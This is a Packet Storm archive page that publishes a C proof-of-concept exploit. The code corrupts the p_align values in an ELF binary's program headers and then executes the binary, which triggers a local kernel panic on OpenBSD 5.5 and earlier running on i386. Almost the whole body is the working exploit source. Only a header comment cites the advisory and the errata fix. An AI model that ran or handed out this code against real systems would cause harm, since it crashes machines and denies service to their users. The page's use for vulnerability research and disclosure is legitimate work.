exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OpenBSD 5.5 Local Kernel Panic

OpenBSD 5.5 Local Kernel Panic
Posted Oct 23, 2014
Authored by nitr0us

OpenBSD versions 5.5 and below local kernel panic proof of concept exploit for i386.

tags | exploit, kernel, local, proof of concept
systems | openbsd
SHA-256 | 4c958cff42a397da0e7fd1de737c29e8578e3c3d90dd8e62623fb389e271ae47

OpenBSD 5.5 Local Kernel Panic

Change Mirror Download
/*
* tenochtitlan.c
*
* OpenBSD <= 5.5 Local Kernel Panic
* by Alejandro Hernandez (@nitr0usmx)
*
* Advisory and technical details:
* http://www.ioactive.com/pdfs/IOActive_Advisory_OpenBSD_5_5_Local_Kernel_Panic.pdf
*
* Fix: http://www.openbsd.org/errata55.html#013_kernexec
*
* This PoC works only for i386.
*
* Bug found with Melkor (ELF file format fuzzer)
* https://github.com/IOActive/Melkor_ELF_Fuzzer
*
* Mexico / Oct 2014
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/types.h>

#ifndef __OpenBSD__
#error "Not an OpenBSD system !!!1111";
#else
#include <sys/exec_elf.h>
#endif

#ifndef __i386__
#error "Not an i386 system !!!1111";
#endif

// In Aztec mythology, Huitzilopochtli, was a god of war, a sun god,
// the patron of the city of Tenochtitlan, the Capital of the Aztec Empire.
const char pyramid[] =
" _____\n"
" _|[]_|_\n"
" _/_/=|_\\_\\_\n"
" _/_ /==| _\\ _\\_\n"
" _/__ /===|_ _\\ __\\_\n"
" _/_ _ /====| ___\\ __\\_\n"
" _/ __ _/=====|_ ___\\ ___ \\_\n"
" _/ ___ _/======| ____ \\_ __ \\_\n";

struct {
unsigned int idx;
Elf32_Word p_align;
} targets[] = {
{ 6, 0xb16b00b5 }, // ( * )( * )
{ 6, 0xdeadface },
{ 4, 0x00001001 },
{ 0, 0x00000004 }
};

int main(int argc, char **argv)
{
Elf32_Ehdr *hdr;
Elf32_Phdr *pht; // Program Header Table
struct stat statinfo;
char *elfptr;
int fd, r;

if(argc < 2){
fprintf(stderr, "Usage: %s <elf_executable>\n", argv[0]);
exit(-1);
}

if((fd = open(argv[1], O_RDWR)) == -1){
perror("open");
exit(-1);
}

if(fstat(fd, &statinfo) == -1){
perror("stat");
close(fd);
exit(-1);
}

if((elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){
perror("mmap");
close(fd);
exit(-1);
}

hdr = (Elf32_Ehdr *) (elfptr);
pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);

printf("[*] hdr->e_phoff:\t0x%.4x\n", hdr->e_phoff);
printf("[*] hdr->e_phnum:\t0x%.4x\n", hdr->e_phnum);

srand(time(NULL));
r = rand();

if(r % 3 == 0){
#ifdef OpenBSD5_5
pht[targets[0].idx].p_align = targets[0].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", targets[0].idx, pht[targets[0].idx].p_align);
#else // OpenBSD 5.2 didn't panic with 0xb16b00b5 in the last LOAD's p_align
pht[targets[1].idx].p_align = targets[1].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", targets[1].idx, pht[targets[1].idx].p_align);
#endif
} else if(r % 3 == 1){
pht[targets[2].idx].p_align = targets[2].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", targets[2].idx, pht[targets[2].idx].p_align);
} else {
int p;

for(p = 0; p < hdr->e_phnum; p++, pht++)
if(pht->p_type == PT_LOAD){
pht->p_align = targets[3].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", p, pht->p_align);
}
}

// Synchronize the ELF in memory and the file system
if(msync(elfptr, 0, MS_ASYNC) == -1){
perror("msync");
close(fd);
exit(-1);
}

if(munmap(elfptr, statinfo.st_size) == -1){
perror("munmap");
close(fd);
exit(-1);
}

close(fd);

printf("%s", pyramid);

sleep(1);
system(argv[1]);

// Should never reach this point, however sometimes the OS didn't crash with
// system() until the 2nd execution. Same behavior with execl and execv too.
printf("... try to execute %s manually.\n", argv[1]);

return -1;
}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close